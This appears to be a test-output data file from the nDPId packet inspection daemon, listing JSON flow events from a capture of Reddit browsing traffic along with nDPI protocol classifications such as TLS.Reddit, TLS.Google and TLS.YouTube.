+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
+00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
+00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
